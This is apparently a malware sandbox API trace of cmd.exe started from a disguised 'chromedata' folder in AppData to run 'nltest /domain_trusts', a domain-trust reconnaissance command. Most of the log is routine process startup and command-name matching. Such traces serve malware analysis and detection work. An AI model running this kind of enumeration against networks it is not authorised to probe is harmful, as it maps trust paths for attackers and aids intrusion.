	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 368
	os_tid = 0xec8

	[0249.570] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf82c | out: lpSystemTimeAsFileTime=0x2cf82c*(dwLowDateTime=0x7c75dd80, dwHighDateTime=0x1d50a6a)) 
	[0249.570] GetCurrentProcessId () returned 0xed0
	[0249.570] GetCurrentThreadId () returned 0xec8
	[0249.570] GetTickCount () returned 0xa9459a
	[0249.571] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf824 | out: lpPerformanceCount=0x2cf824*=32340853442) returned 1
	[0249.571] GetModuleHandleA (lpModuleName=0x0) returned 0x49df0000
	[0249.571] __set_app_type (_Type=0x1) 
	[0249.571] __p__fmode () returned 0x770231f4
	[0249.571] __p__commode () returned 0x770231fc
	[0249.571] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e121a6) returned 0x0
	[0249.571] __getmainargs (in: _Argc=0x49e14238, _Argv=0x49e14240, _Env=0x49e1423c, _DoWildCard=0, _StartInfo=0x49e14140 | out: _Argc=0x49e14238, _Argv=0x49e14240, _Env=0x49e1423c) returned 0
	[0249.572] GetCurrentThreadId () returned 0xec8
	[0249.572] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xec8) returned 0x38
	[0249.572] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0249.572] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0249.572] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0249.572] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0249.572] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf7bc | out: phkResult=0x2cf7bc*=0x0) returned 0x2
	[0249.572] VirtualQuery (in: lpAddress=0x2cf7f3, lpBuffer=0x2cf78c, dwLength=0x1c | out: lpBuffer=0x2cf78c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0249.572] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf78c, dwLength=0x1c | out: lpBuffer=0x2cf78c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0249.572] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf78c, dwLength=0x1c | out: lpBuffer=0x2cf78c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0249.572] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf78c, dwLength=0x1c | out: lpBuffer=0x2cf78c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0249.572] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf78c, dwLength=0x1c | out: lpBuffer=0x2cf78c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0249.572] GetConsoleOutputCP () returned 0x1b5
	[0249.572] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0249.572] SetConsoleCtrlHandler (HandlerRoutine=0x49e0e72a, Add=1) returned 1
	[0249.573] _get_osfhandle (_FileHandle=1) returned 0x160
	[0249.573] SetConsoleMode (hConsoleHandle=0x160, dwMode=0x0) returned 0
	[0249.573] _get_osfhandle (_FileHandle=1) returned 0x160
	[0249.573] GetConsoleMode (in: hConsoleHandle=0x160, lpMode=0x49e141ac | out: lpMode=0x49e141ac) returned 0
	[0249.573] _get_osfhandle (_FileHandle=0) returned 0x14c
	[0249.573] GetConsoleMode (in: hConsoleHandle=0x14c, lpMode=0x49e141b0 | out: lpMode=0x49e141b0) returned 0
	[0249.573] GetEnvironmentStringsW () returned 0x4401d0*
	[0249.573] GetProcessHeap () returned 0x430000
	[0249.573] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x8fa) returned 0x440ad8
	[0249.573] FreeEnvironmentStringsW (penv=0x4401d0) returned 1
	[0249.573] GetProcessHeap () returned 0x430000
	[0249.573] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4) returned 0x440050
	[0249.573] GetEnvironmentStringsW () returned 0x4401d0*
	[0249.573] GetProcessHeap () returned 0x430000
	[0249.573] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x8fa) returned 0x4413e0
	[0249.573] FreeEnvironmentStringsW (penv=0x4401d0) returned 1
	[0249.573] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce72c | out: phkResult=0x2ce72c*=0x40) returned 0x0
	[0249.573] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x0, lpData=0x2ce738*=0xe8, lpcbData=0x2ce730*=0x1000) returned 0x2
	[0249.573] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x4, lpData=0x2ce738*=0x1, lpcbData=0x2ce730*=0x4) returned 0x0
	[0249.573] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x0, lpData=0x2ce738*=0x1, lpcbData=0x2ce730*=0x1000) returned 0x2
	[0249.573] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x4, lpData=0x2ce738*=0x0, lpcbData=0x2ce730*=0x4) returned 0x0
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x4, lpData=0x2ce738*=0x40, lpcbData=0x2ce730*=0x4) returned 0x0
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x4, lpData=0x2ce738*=0x40, lpcbData=0x2ce730*=0x4) returned 0x0
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x0, lpData=0x2ce738*=0x40, lpcbData=0x2ce730*=0x1000) returned 0x2
	[0249.574] RegCloseKey (hKey=0x40) returned 0x0
	[0249.574] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce72c | out: phkResult=0x2ce72c*=0x40) returned 0x0
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x0, lpData=0x2ce738*=0x40, lpcbData=0x2ce730*=0x1000) returned 0x2
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x4, lpData=0x2ce738*=0x1, lpcbData=0x2ce730*=0x4) returned 0x0
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x0, lpData=0x2ce738*=0x1, lpcbData=0x2ce730*=0x1000) returned 0x2
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x4, lpData=0x2ce738*=0x0, lpcbData=0x2ce730*=0x4) returned 0x0
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x4, lpData=0x2ce738*=0x9, lpcbData=0x2ce730*=0x4) returned 0x0
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x4, lpData=0x2ce738*=0x9, lpcbData=0x2ce730*=0x4) returned 0x0
	[0249.574] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce734, lpData=0x2ce738, lpcbData=0x2ce730*=0x1000 | out: lpType=0x2ce734*=0x0, lpData=0x2ce738*=0x9, lpcbData=0x2ce730*=0x1000) returned 0x2
	[0249.574] RegCloseKey (hKey=0x40) returned 0x0
	[0249.574] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadff6
	[0249.574] srand (_Seed=0x5cdadff6) 
	[0249.574] GetCommandLineW () returned="/c nltest /domain_trusts"
	[0249.574] GetCommandLineW () returned="/c nltest /domain_trusts"
	[0249.574] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e15260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0249.574] GetProcessHeap () returned 0x430000
	[0249.574] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x210) returned 0x441ce8
	[0249.574] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0249.575] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0249.575] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0249.575] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0249.575] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0249.575] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0249.575] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0249.575] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0249.575] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0249.575] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0249.575] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0249.575] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0249.575] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0249.575] GetProcessHeap () returned 0x430000
	[0249.575] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440ad8 | out: hHeap=0x430000) returned 1
	[0249.575] GetEnvironmentStringsW () returned 0x4401d0*
	[0249.575] GetProcessHeap () returned 0x430000
	[0249.575] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x912) returned 0x442820
	[0249.575] FreeEnvironmentStringsW (penv=0x4401d0) returned 1
	[0249.575] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.575] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0249.575] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0249.575] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0249.575] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0249.575] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0249.575] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0249.575] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0249.575] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0249.575] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0249.576] GetProcessHeap () returned 0x430000
	[0249.576] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x6a) returned 0x4307f0
	[0249.576] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf4f8 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0249.576] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", nBufferLength=0x104, lpBuffer=0x2cf4f8, lpFilePart=0x2cf4f4 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x2cf4f4*="chromedata") returned 0x30
	[0249.576] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0249.576] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf274 | out: lpFindFileData=0x2cf274*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x440060
	[0249.576] FindClose (in: hFindFile=0x440060 | out: hFindFile=0x440060) returned 1
	[0249.576] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc", lpFindFileData=0x2cf274 | out: lpFindFileData=0x2cf274*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XC7u663GxWc", cAlternateFileName="2XC7U6~1")) returned 0x440060
	[0249.576] FindClose (in: hFindFile=0x440060 | out: hFindFile=0x440060) returned 1
	[0249.576] _wcsnicmp (_String1="2XC7U6~1", _String2="2XC7u663GxWc", _MaxCount=0xc) returned 72
	[0249.576] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData", lpFindFileData=0x2cf274 | out: lpFindFileData=0x2cf274*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc173b540, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x440060
	[0249.576] FindClose (in: hFindFile=0x440060 | out: hFindFile=0x440060) returned 1
	[0249.576] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming", lpFindFileData=0x2cf274 | out: lpFindFileData=0x2cf274*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0x78fd700, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x78fd700, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x440060
	[0249.577] FindClose (in: hFindFile=0x440060 | out: hFindFile=0x440060) returned 1
	[0249.577] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFindFileData=0x2cf274 | out: lpFindFileData=0x2cf274*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x744be640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x744be640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="chromedata", cAlternateFileName="CHROME~1")) returned 0x440060
	[0249.577] FindClose (in: hFindFile=0x440060 | out: hFindFile=0x440060) returned 1
	[0249.577] _wcsnicmp (_String1="CHROME~1", _String2="chromedata", _MaxCount=0xa) returned 26
	[0249.577] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0249.577] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 1
	[0249.577] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 1
	[0249.577] GetProcessHeap () returned 0x430000
	[0249.577] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x442820 | out: hHeap=0x430000) returned 1
	[0249.577] GetEnvironmentStringsW () returned 0x4401d0*
	[0249.577] GetProcessHeap () returned 0x430000
	[0249.577] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x97c) returned 0x441f00
	[0249.577] FreeEnvironmentStringsW (penv=0x4401d0) returned 1
	[0249.577] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e15260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0249.577] GetProcessHeap () returned 0x430000
	[0249.577] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4307f0 | out: hHeap=0x430000) returned 1
	[0249.577] GetProcessHeap () returned 0x430000
	[0249.577] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400e) returned 0x443ac8
	[0249.578] GetProcessHeap () returned 0x430000
	[0249.578] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x38) returned 0x440060
	[0249.578] GetProcessHeap () returned 0x430000
	[0249.578] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x443ac8 | out: hHeap=0x430000) returned 1
	[0249.578] GetConsoleOutputCP () returned 0x1b5
	[0249.578] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0249.578] GetUserDefaultLCID () returned 0x409
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e14950, cchData=8 | out: lpLCData=":") returned 2
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf638, cchData=128 | out: lpLCData="0") returned 2
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf638, cchData=128 | out: lpLCData="0") returned 2
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf638, cchData=128 | out: lpLCData="1") returned 2
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e14940, cchData=8 | out: lpLCData="/") returned 2
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e14d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e14d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e14d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e14cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e14c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e14c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e14c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0249.578] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e14930, cchData=8 | out: lpLCData=".") returned 2
	[0249.579] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e14920, cchData=8 | out: lpLCData=",") returned 2
	[0249.579] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0249.580] GetProcessHeap () returned 0x430000
	[0249.580] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20c) returned 0x4428c0
	[0249.580] GetConsoleTitleW (in: lpConsoleTitle=0x4428c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.580] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0249.580] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0249.580] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0249.580] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0249.580] GetProcessHeap () returned 0x430000
	[0249.580] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400a) returned 0x443ac8
	[0249.580] GetProcessHeap () returned 0x430000
	[0249.580] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x443ac8 | out: hHeap=0x430000) returned 1
	[0249.581] _wcsicmp (_String1="nltest", _String2=")") returned 69
	[0249.581] _wcsicmp (_String1="FOR", _String2="nltest") returned -8
	[0249.581] _wcsicmp (_String1="FOR/?", _String2="nltest") returned -8
	[0249.581] _wcsicmp (_String1="IF", _String2="nltest") returned -5
	[0249.581] _wcsicmp (_String1="IF/?", _String2="nltest") returned -5
	[0249.581] _wcsicmp (_String1="REM", _String2="nltest") returned 4
	[0249.581] _wcsicmp (_String1="REM/?", _String2="nltest") returned 4
	[0249.581] GetProcessHeap () returned 0x430000
	[0249.581] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x442ad8
	[0249.581] GetProcessHeap () returned 0x430000
	[0249.581] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x16) returned 0x442b38
	[0249.581] GetProcessHeap () returned 0x430000
	[0249.581] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x28) returned 0x442b58
	[0249.582] GetConsoleTitleW (in: lpConsoleTitle=0x2cf330, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.582] _wcsicmp (_String1="nltest", _String2="DIR") returned 10
	[0249.582] _wcsicmp (_String1="nltest", _String2="ERASE") returned 9
	[0249.582] _wcsicmp (_String1="nltest", _String2="DEL") returned 10
	[0249.582] _wcsicmp (_String1="nltest", _String2="TYPE") returned -6
	[0249.582] _wcsicmp (_String1="nltest", _String2="COPY") returned 11
	[0249.582] _wcsicmp (_String1="nltest", _String2="CD") returned 11
	[0249.582] _wcsicmp (_String1="nltest", _String2="CHDIR") returned 11
	[0249.582] _wcsicmp (_String1="nltest", _String2="RENAME") returned -4
	[0249.582] _wcsicmp (_String1="nltest", _String2="REN") returned -4
	[0249.582] _wcsicmp (_String1="nltest", _String2="ECHO") returned 9
	[0249.582] _wcsicmp (_String1="nltest", _String2="SET") returned -5
	[0249.582] _wcsicmp (_String1="nltest", _String2="PAUSE") returned -2
	[0249.582] _wcsicmp (_String1="nltest", _String2="DATE") returned 10
	[0249.582] _wcsicmp (_String1="nltest", _String2="TIME") returned -6
	[0249.582] _wcsicmp (_String1="nltest", _String2="PROMPT") returned -2
	[0249.582] _wcsicmp (_String1="nltest", _String2="MD") returned 1
	[0249.582] _wcsicmp (_String1="nltest", _String2="MKDIR") returned 1
	[0249.582] _wcsicmp (_String1="nltest", _String2="RD") returned -4
	[0249.582] _wcsicmp (_String1="nltest", _String2="RMDIR") returned -4
	[0249.582] _wcsicmp (_String1="nltest", _String2="PATH") returned -2
	[0249.582] _wcsicmp (_String1="nltest", _String2="GOTO") returned 7
	[0249.582] _wcsicmp (_String1="nltest", _String2="SHIFT") returned -5
	[0249.582] _wcsicmp (_String1="nltest", _String2="CLS") returned 11
	[0249.582] _wcsicmp (_String1="nltest", _String2="CALL") returned 11
	[0249.582] _wcsicmp (_String1="nltest", _String2="VERIFY") returned -8
	[0249.582] _wcsicmp (_String1="nltest", _String2="VER") returned -8
	[0249.582] _wcsicmp (_String1="nltest", _String2="VOL") returned -8
	[0249.582] _wcsicmp (_String1="nltest", _String2="EXIT") returned 9
	[0249.583] _wcsicmp (_String1="nltest", _String2="SETLOCAL") returned -5
	[0249.583] _wcsicmp (_String1="nltest", _String2="ENDLOCAL") returned 9
	[0249.583] _wcsicmp (_String1="nltest", _String2="TITLE") returned -6
	[0249.583] _wcsicmp (_String1="nltest", _String2="START") returned -5
	[0249.583] _wcsicmp (_String1="nltest", _String2="DPATH") returned 10
	[0249.583] _wcsicmp (_String1="nltest", _String2="KEYS") returned 3
	[0249.583] _wcsicmp (_String1="nltest", _String2="MOVE") returned 1
	[0249.583] _wcsicmp (_String1="nltest", _String2="PUSHD") returned -2
	[0249.583] _wcsicmp (_String1="nltest", _String2="POPD") returned -2
	[0249.583] _wcsicmp (_String1="nltest", _String2="ASSOC") returned 13
	[0249.583] _wcsicmp (_String1="nltest", _String2="FTYPE") returned 8
	[0249.583] _wcsicmp (_String1="nltest", _String2="BREAK") returned 12
	[0249.583] _wcsicmp (_String1="nltest", _String2="COLOR") returned 11
	[0249.583] _wcsicmp (_String1="nltest", _String2="MKLINK") returned 1
	[0249.583] _wcsicmp (_String1="nltest", _String2="DIR") returned 10
	[0249.583] _wcsicmp (_String1="nltest", _String2="ERASE") returned 9
	[0249.583] _wcsicmp (_String1="nltest", _String2="DEL") returned 10
	[0249.583] _wcsicmp (_String1="nltest", _String2="TYPE") returned -6
	[0249.583] _wcsicmp (_String1="nltest", _String2="COPY") returned 11
	[0249.583] _wcsicmp (_String1="nltest", _String2="CD") returned 11
	[0249.583] _wcsicmp (_String1="nltest", _String2="CHDIR") returned 11
	[0249.583] _wcsicmp (_String1="nltest", _String2="RENAME") returned -4
	[0249.583] _wcsicmp (_String1="nltest", _String2="REN") returned -4
	[0249.583] _wcsicmp (_String1="nltest", _String2="ECHO") returned 9
	[0249.583] _wcsicmp (_String1="nltest", _String2="SET") returned -5
	[0249.583] _wcsicmp (_String1="nltest", _String2="PAUSE") returned -2
	[0249.583] _wcsicmp (_String1="nltest", _String2="DATE") returned 10
	[0249.583] _wcsicmp (_String1="nltest", _String2="TIME") returned -6
	[0249.583] _wcsicmp (_String1="nltest", _String2="PROMPT") returned -2
	[0249.583] _wcsicmp (_String1="nltest", _String2="MD") returned 1
	[0249.583] _wcsicmp (_String1="nltest", _String2="MKDIR") returned 1
